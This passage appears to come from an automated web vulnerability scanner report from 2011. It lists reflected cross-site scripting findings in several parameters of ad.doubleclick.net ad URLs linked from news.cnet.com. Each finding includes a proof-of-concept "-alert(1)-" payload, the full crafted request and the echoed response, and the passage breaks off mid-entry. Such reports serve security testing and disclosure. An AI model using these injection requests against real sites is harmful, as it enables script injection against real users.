GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=359eb9'-alert(1)-'a7fc128b15f&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
07-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=359eb9'-alert(1)-'a7fc128b15f&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5N
...[SNIP]...

3.161. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56db1"-alert(1)-"f50fc3f5031 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=356db1"-alert(1)-"f50fc3f5031&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
07-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=356db1"-alert(1)-"f50fc3f5031&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5N
...[SNIP]...

3.162. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5af5b"-alert(1)-"d6186458506 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=193815af5b"-alert(1)-"d6186458506&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/182/%2a/j%3B238347919%3B1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=193815af5b"-alert(1)-"d6186458506&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppar
...[SNIP]...

3.163. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3311b'-alert(1)-'99299d172eb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=193813311b'-alert(1)-'99299d172eb&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=193813311b'-alert(1)-'99299d172eb&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppar
...[SNIP]...

3.164. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49200"-alert(1)-"2b903183c61 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4549200"-alert(1)-"2b903183c61&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4549200"-alert(1)-"2b903183c61&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyImpUrl = "";

...[SNIP]...

3.165. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2600b'-alert(1)-'a9e12c1e8f3 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.452600b'-alert(1)-'a9e12c1e8f3&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.452600b'-alert(1)-'a9e12c1e8f3&event=58/http://www.blackberry.com">
...[SNIP]...

3.166. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 176ca"-alert(1)-"53528f4652 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5176ca"-alert(1)-"53528f4652&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5176ca"-alert(1)-"53528f4652&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOY
...[SNIP]...

3.167. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a176b"-alert(1)-"36a5848f12d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0a176b"-alert(1)-"36a5848f12d&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0a176b"-alert(1)-"36a5848f12d&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event
...[SNIP]...

3.168. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [count parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd5b"-alert(1)-"1ee697af197 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=fcd5b"-alert(1)-"1ee697af197&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
0784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=fcd5b"-alert(1)-"1ee697af197&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN048");
var fscUrl = url;
var fs
...[SNIP]...

3.169. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [cpnmodule parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1593"-alert(1)-"9914ac032e4 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=b1593"-alert(1)-"9914ac032e4&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=b1593"-alert(1)-"9914ac032e4&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
...[SNIP]...

3.170. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [e parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bddae"-alert(1)-"32d4a8875d7 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

